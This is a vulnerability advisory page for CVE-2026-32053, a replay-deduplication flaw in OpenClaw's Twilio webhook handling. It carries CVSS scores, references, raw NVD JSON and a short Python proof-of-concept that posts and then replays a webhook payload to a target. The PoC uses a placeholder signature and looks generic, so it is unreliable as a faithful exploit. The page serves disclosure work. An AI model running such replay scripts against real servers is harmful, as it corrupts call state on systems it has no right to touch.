CVE-2026-32053

Description

OpenClaw versions prior to 2026.2.23 contain a vulnerability in Twilio webhook event deduplication where normalized event IDs are randomized per parse, allowing replay events to bypass manager dedupe checks. Attackers can replay Twilio webhook events to trigger duplicate or stale call-state transitions, potentially causing incorrect call handling and state corruption.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

# Target URL
url = "http://target-openclaw-server/webhook/twilio"

# Sample legitimate Twilio webhook payload (captured from network)
payload = {
    "CallSid": "CA1234567890ABCDE",
    "From": "+1234567890",
    "To": "+0987654321",
    "CallStatus": "ringing",
    "CallerName": "Attacker"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Twilio-Signature": "valid_signature_or_bypass"
}

print("[+] Sending initial webhook request...")
r1 = requests.post(url, data=payload, headers=headers)
print(f"Status Code: {r1.status_code}")

print("[+] Waiting 2 seconds...")
time.sleep(2)

print("[+] Replaying the same webhook request (Replay Attack)...")
# Due to the randomization in ID normalization, this replay should bypass deduplication
r2 = requests.post(url, data=payload, headers=headers)
print(f"Status Code: {r2.status_code}")

if r2.status_code == 200:
    print("[!] Replay successful! Duplicate event processed.")
else:
    print("[-] Replay failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32053
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32053
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32053/
[4] VulDB https://vuldb.com/cve/CVE-2026-32053
[5] https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7
[7] https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32053", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:08.503", "lastModified": "2026-03-24T21:15:38.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.23 contain a vulnerability in Twilio webhook event deduplication where normalized event IDs are randomized per parse, allowing replay events to bypass manager dedupe checks. Attackers can replay Twilio webhook events to trigger duplicate or stale call-state transitions, potentially causing incorrect call handling and state corruption."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.23 contienen una vulnerabilidad en la deduplicación de eventos de webhook de Twilio donde los ID de evento normalizados se aleatorizan por análisis, permitiendo que los eventos de repetición eludan las comprobaciones de deduplicación del gestor. Los atacantes pueden repetir eventos de webhook de Twilio para desencadenar transiciones de estado de llamada duplicadas o obsoletas, lo que podría causar un manejo incorrecto de las llamadas y corrupción del estado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.23", "matchCriteriaId": "19EDA1E2-F0D6-44F4-A333-C32DCE286DA6"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}